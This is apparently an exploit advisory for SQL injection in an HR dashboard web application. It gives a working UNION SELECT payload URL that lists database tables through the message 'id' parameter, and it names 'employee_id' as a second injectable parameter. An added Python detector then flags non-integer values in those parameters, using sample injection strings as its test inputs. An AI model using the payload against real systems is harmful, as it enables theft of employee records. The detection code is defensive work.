The vulnerability allows employee users to inject SQL commands.
http://localhost/[PATH]/?hr-dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]-23+union+select 1,2,3,4,5,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),7,8--%20-
http://localhost/[PATH]/?hr-dashboard=user&page=user&tab=view_employee&action=view&employee_id=[SQL]
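
A defender-side check for the two parameters named above, added here as an example and not part of the original advisory: it scans request URLs (for instance from a web server access log) and flags any `id` or `employee_id` value that is not a plain integer. That both parameters should carry only an integer key is an assumption, and the function name, the `/app/` path and the sample URLs are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory marks as injectable, keyed by the (page, tab) that reads them.
WATCHED = {
    ("message", "view_message"): "id",
    ("user", "view_employee"): "employee_id",
}
# Assumption: both parameters are meant to carry a non-negative integer key.
INT_RE = re.compile(r"[0-9]{1,18}")

# Constructed sample requests; "/app/" stands in for the advisory's [PATH].
SAMPLES = [
    "http://localhost/app/?hr-dashboard=user&page=message&tab=view_message&from=inbox&id=23",
    "http://localhost/app/?hr-dashboard=user&page=message&tab=view_message&from=inbox&id=-23+union+select+1",
    "http://localhost/app/?hr-dashboard=user&page=user&tab=view_employee&action=view&employee_id=7%27",
    "http://localhost/app/?hr-dashboard=user&page=message&tab=view_message&id=5&id=5%20or%201",
]


def suspicious_params(url):
    """Return [(param, decoded_value)] for watched parameters that are not plain integers."""
    # parse_qs percent-decodes values and turns '+' into a space, as the server would.
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if "hr-dashboard" not in query:
        return []
    findings = []
    for page in query.get("page", []):
        for tab in query.get("tab", []):
            name = WATCHED.get((page, tab))
            if name is None:
                continue
            # Check every occurrence: a repeated parameter can hide a bad value
            # behind a clean one.
            for value in query.get(name, []):
                if not INT_RE.fullmatch(value):
                    findings.append((name, value))
    return findings


if __name__ == "__main__":
    for sample in SAMPLES:
        for name, value in suspicious_params(sample):
            print(f"non-integer {name}={value!r} in {sample}")
```

The same integer-only rule belongs in the application itself, alongside parameterized queries, before either value reaches the database.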